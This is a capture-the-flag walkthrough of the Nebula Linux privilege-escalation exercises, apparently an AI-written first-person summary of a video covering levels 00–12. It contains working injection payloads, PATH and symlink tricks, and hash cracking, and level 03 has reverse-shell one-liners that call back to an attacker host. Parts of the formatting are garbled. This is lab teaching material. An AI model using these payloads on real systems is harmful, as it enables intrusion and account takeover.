Nebula Level 06 Description
The flag06 account credentials came from a legacy unix system.a To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.
I’m happy to provide a detailed summary of the video, acting as a video summarizer expert! I’ll break down each level and the technical commands I observed.
Nebula Exploit Exercises: A Detailed Walkthrough
I recently went through the Nebula exploit exercises, which are fantastic for anyone starting out with Linux privilege escalation. I covered levels 00 through 12, demonstrating various techniques to gain higher privileges.
Getting Started
First, I explained how to download the Nebula ISO file and import it into VMware Workstation. To set up my workspace, I used two terminal tabs: one for logging into the Nebula virtual machine via SSH and another to act as a local listener for potential reverse shells.
Level 00: Finding a SetUID Program
My goal here was to find a Set User ID (SUID) program that runs as the flag00
account.
- I logged in using
ssh level00@<nebula_ip>
with the passwordlevel00
. - To find SUID programs owned by
flag00
, I used the command:Bashfind / -perm -u=s -type f 2>/dev/null
- After identifying the correct binary, I navigated to its directory (e.g.,
cd /bin/.../flag00
), listed the files withls -la
, and then executed the SUID binary using./flag00
. - Finally, I confirmed the challenge completion with
getflag
.
Level 01: Exploiting Environment Variables (Path Injection)
In this level, I exploited a program that was vulnerable due to how it called echo
without an absolute path, allowing for arbitrary program execution.
- I switched to the
level01
user withsu level01
(password:level01
) and navigated to/home/flag01
. - The
flag01
program executedecho
using the system’sPATH
. - My exploit involved:
- Moving to a writable directory:
cd /tmp
- Creating a symbolic link named
echo
that pointed to/bin/getflag
:ln -s /bin/getflag echo
- Prepending the current directory (
/tmp
) to thePATH
environment variable:export PATH=/tmp:$PATH
- Executing the vulnerable program:
/home/flag01/flag01
. This made the system run my customecho
(which wasgetflag
) withflag01
privileges.
- Moving to a writable directory:
Level 02: Exploiting Environment Variables (Command Injection via sprintf
and getenv
)
Here, I exploited a program that used getenv
to fetch an environment variable and then unsafely used its value in a system()
call.
- I switched to
level02
usingsu level02
(password:level02
) and went to/home/flag02
. - The
flag02
program usedgetenv("USER")
and incorporated it into a command executed bysystem()
. - My exploit involved modifying the
USER
environment variable to include a command injection payload:export USER=';/bin/getflag;'
. The semicolons allowed me to terminate the existing command and inject a new one. - Then, I executed the vulnerable program:
./flag02
.
Level 03: Exploiting a Writable Cron Job Script
This level involved a cron job that regularly executed a script, which in turn executed files from a world-writable directory.
- I switched to
level03
withsu level03
(password:level03
) and navigated to/home/flag03
. - I found that the
writable.sh
script iterated through and executed files in/home/flag03/writable.d/
. - My exploit steps were:
- Navigate to the writable directory:
cd writable.d
- Create a script to initiate a reverse shell:Bash
echo 'nc -e /bin/bash <your_attacker_ip> <your_listener_port>' > shell.sh
(I also noted an alternative netcat payload:echo 'bash -i >& /dev/tcp/<your_attacker_ip>/<your_listener_port> 0>&1' > shell.sh
) - Make the script executable:
chmod +x shell.sh
- Then, I waited for the cron job to execute
writable.sh
, which would then runshell.sh
, giving me a reverse shell asflag03
.
- Navigate to the writable directory:
Level 04: Bypassing File Access Restrictions with Symbolic Links
My goal in this level was to read a restricted “token” file. The flag04
program prevented direct access to the token file by its name.
- I switched to
level04
usingsu level04
(password:level04
) and went to/home/flag04
. - The
flag04
program took a filename as an argument but blocked “token”. - My exploit involved:
- Going to a writable directory:
cd /tmp
- Creating a symbolic link to the token file with a different name:
ln -s /home/flag04/token mytoken
(I usedlevel04
as the link name in the video). - Executing the program with the symbolic link as the argument:
/home/flag04/flag04 /tmp/mytoken
. This revealed the token.
- Going to a writable directory:
Level 05: Weak Directory Permissions & SSH Key
This level focused on exploiting weak directory permissions to find an SSH private key.
- I switched to
level05
withsu level05
(password:level05
) and navigated to/home/flag05
. - I discovered a backup directory
.backup
containing a compressed file (backups.tgz
). - My exploit steps were:
- Copy the archive to a writable location:
cp .backup/backups.tgz /tmp/
- Go to
/tmp
:cd /tmp
- Extract the archive:
tar -zxvf backups.tgz
. This extracted an.ssh
directory withid_rsa
(private key) andid_rsa.pub
. - I then attempted to use the private key to SSH as
flag05
:ssh -i /tmp/.ssh/id_rsa flag05@localhost
(though I noted a VM issue during the video).
- Copy the archive to a writable location:
Level 06: Legacy Unix Password Hashing
My objective here was to crack a user’s password hash found in /etc/passwd
.
- I switched to
level06
usingsu level06
(password:level06
). - My commands were:
- View the password file:
cat /etc/passwd
. - Copy the line for
flag06
(containing the hash). - On my attacker machine, I saved the line to a file (e.g.,
hash.txt
). - I cracked it using John the Ripper:
john hash.txt
(orjohn --show hash.txt
if pre-cracked). - Finally, I used the cracked password (“hello”) to
su flag06
.
- View the password file:
Level 07: Command Injection in a Perl CGI Script
This level involved exploiting command injection in a Perl CGI script that pinged a host.
- I switched to
level07
withsu level07
(password:level07
) and went to/home/flag07
. - The
index.cgi
script took ahost
parameter and used it unsafely in a ping command. The webserver (thttpd.conf
) ran asflag07
on port7070
. - My initial local test exploit was:
./index.cgi host=127.0.0.1;ls
- For the webserver exploit to run as
flag07
, I used:Bashwget "http://127.0.0.1:7070/index.cgi?host=127.0.0.1%3Bgetflag" -O /tmp/output
(%3B
is the URL encoding for;
). - I then checked the output with
cat /tmp/output
.
Level 08: Analyzing Network Capture (PCAP) for Credentials
My goal was to extract credentials from a provided PCAP file.
- I switched to
level08
usingsu level08
(password:level08
). - A
.pcap
file was in the home directory. - My exploit steps were:
- Transfer the PCAP file to my attacker machine (e.g., using Python’s
SimpleHTTPServer
on Nebula:python -m SimpleHTTPServer 8000
, andwget http://<nebula_ip>:8000/capture.pcap
on the attacker). - Open the PCAP in Wireshark.
- Follow the TCP stream.
- I carefully analyzed the hex view to account for backspaces (
7F
characters) to deduce the actual password. The typed password was “backd00r” then backspace three times (removing “00r”), then “M8” then backspace (removing “8”), then “@”. So the correct password was “backdM@”. - Finally, I used
su flag08
with the deduced password.
- Transfer the PCAP file to my attacker machine (e.g., using Python’s
Level 09: PHP preg_replace
/e Modifier Vulnerability
This level involved exploiting a PHP script that used preg_replace
with the /e
(evaluate) modifier, allowing code execution.
- I switched to
level09
withsu level09
(password:level09
). - There was a SUID wrapper
flag09
that executed a PHP scriptflag09.php
. The PHP script usedpreg_replace("/\
$filename
was the first argument.
- Go to
/tmp
:cd /tmp
- Create a file (e.g.,
exploit.txt
) with the content:[email]${system($_SERVER['argv'])}[/email]
. This crafted input matched the regex, and the
/e
modifier executed the captured string as PHP code.$_SERVER['argv']
would be the second argument passed to theflag09
wrapper.Execute the wrapper:
/home/flag09/flag09 /tmp/exploit.txt getflag
. Here,/tmp/exploit.txt
became$filename
for the PHP script, andgetflag
became$_SERVER['argv']
, which was then executed bysystem()
.Level 10 & 11: Skipped Levels
I decided to skip Level 10 (Time-of-Check to Time-of-Use - TOCTOU) because it's quite noisy and involves race conditions. I also skipped Level 11 due to an issue with its code.
Level 12: Command Injection in Lua Script
My final challenge was exploiting command injection in a Lua script listening on a port.
- I switched to
level12
usingsu level12
(password:level12
). - I found a Lua script
flag12.lua
and a process listening on port 50001. The Lua script usedio.popen("echo "..password.." | sha1sum")
, making it vulnerable to command injection. - My exploit steps were:
- Connect to the service:
nc 127.0.0.1 50001
- Send the payload as the password. The payload needed to inject a command. I used:
anypassword'; /usr/bin/getflag > /home/flag12/test2; echo 'm
. This injected thegetflag
command, redirecting its output to a file. - Finally, I checked the output file:
cat /home/flag12/test2
- Connect to the service:
Video Walkthrough
- I switched to